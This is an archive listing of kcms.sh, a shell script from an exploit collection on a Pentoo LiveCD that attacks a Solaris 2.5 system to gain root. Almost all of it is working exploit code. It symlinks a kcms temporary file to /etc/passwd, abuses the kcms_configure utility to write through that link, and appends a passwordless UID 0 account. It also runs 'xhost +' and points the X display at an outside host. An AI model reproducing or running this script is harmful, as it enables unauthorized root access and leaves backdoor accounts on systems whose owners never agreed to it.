home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / kcms.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  1KB  |  38 lines

  1. #!/bin/sh -x
  2. # kcmsr00t.sh - hack root on a solaris 2.5 box
  3. #
  4. # original by JungSeok. Roh  ( beren@cosmos.kaist.ac.kr )
  5. # play-testing, proper thrashing of /.rhosts and "hey, bring up an
  6. # xterm!" by Erik Fichtner (techs@spooge.effluvium.com) and 
  7. # Pat Hess (phess@spooge.effluvium.com)
  8. #
  9. # To Prevent This Script:
  10. # % chmod 755 /usr/openwin/bin/kcms*
  11. #
  12.  
  13. notbroken=1
  14. DISPLAY="dial-cup2-3.iway.aimnet.com:0.0"
  15. export DISPLAY
  16. /usr/openwin/bin/xhost +
  17. #  make sure we're ready to go
  18. /bin/rm -rf /tmp/Kp_kcms_sys.sem
  19. cd /tmp
  20. /bin/ln -s /etc/passwd Kp_kcms_sys.sem
  21.  
  22. /usr/openwin/bin/kcms_calibrate &
  23. echo "Click a window to hack r00t."
  24.  
  25. while [ $notbroken -eq 1 ]
  26. do
  27.   echo "Change your monitor type."
  28.   /usr/openwin/bin/kcms_configure -o -d $DISPLAY
  29.   /usr/openwin/share/etc/devdata/profiles/kcmsEKsony20.mon
  30.  
  31.   if [ -f /etc/passwd ]; then
  32.     /bin/echo  "blah:x:0:0::/:/bin/sh" >> /etc/passwd
  33.     notbroken=0
  34.   fi
  35.  
  36. done
  37. #                 www.hack.co.za           [2000]#